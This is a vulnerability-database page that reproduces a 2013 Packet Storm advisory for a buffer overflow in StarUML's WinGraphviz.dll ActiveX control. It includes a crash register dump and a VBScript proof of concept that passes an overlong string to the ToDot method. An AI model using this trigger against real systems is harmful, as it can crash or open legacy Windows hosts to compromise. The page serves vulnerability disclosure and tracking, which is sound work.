Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

StarUML Buffer Overflow

🗓️ 03 Aug 2013 00:00:00Reported by d3b4gType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

StarUML WinGraphviz.dll ActiveX buffer overflow vulnerabilit

Code
`# Exploit Title: StarUML WinGraphviz.dll ActiveX buffer overflow vulnerability  
# Date: 03.8.2013  
# Exploit Author: d3b4g  
# Vendor Homepage:http://staruml.sourceforge.net/en/  
# Software Link: http://staruml.sourceforge.net/en/  
# Tested on: Windows XP SP3  
  
  
  
About StarUML  
--------------  
  
StarUML is an open source project to develop fast, flexible, extensible, featureful, and freely-available UML/MDA platform running on Win32 platform.  
  
  
  
  
  
Exception Code: ACCESS_VIOLATION  
Disasm: D98439 MOV DL,[EBP] (WinGraphviz.DLL)  
  
Seh Chain:  
--------------------------------------------------  
1 6B47D959 VBSCRIPT.dll  
2 772FE115 ntdll.dll  
  
  
Called From Returns To   
--------------------------------------------------  
  
  
Registers:  
--------------------------------------------------  
EIP 00D98439 -> Asc: http://test\test\test\te?s\test\test\tes\ttest\tes  
EAX 00894119 -> Asc: http://test\test\test\te?s\test\test\tes\ttest\tes  
EBX 0020D70A -> 00000038  
ECX 00894119 -> Asc: http://test\test\test\te?s\test\test\tes\ttest\tes  
EDX 000003FF  
EDI 000003FE  
ESI 00000000  
EBP 00000000  
ESP 0020D618 -> 00000059  
  
  
  
The example code below triggers the vulnerability  
-------------------------------------------------  
  
  
<object classid='clsid:1F25D86C-95BC-4E33-A177-EE8DABEF8B04' id='target' />  
<script language='vbscript'>  
targetFile = "C:\Program Files\StarUML\WinGraphviz.dll"  
prototype = "Function ToDot ( ByVal Source As String ) As String"  
memberName = "ToDot"  
progid = "WINGRAPHVIZLib.NEATO"  
argCount = 1  
  
arg1="http://test\test\test\te?s\test\test\tes\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\"  
  
target.ToDot arg1  
  
</script>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Aug 2013 00:00Current
0.7Low risk
Vulners AI Score0.7
exploitstarumlwingraphviz.dllbuffer overflowvulnerabilityactivexwindows xpsecurity
28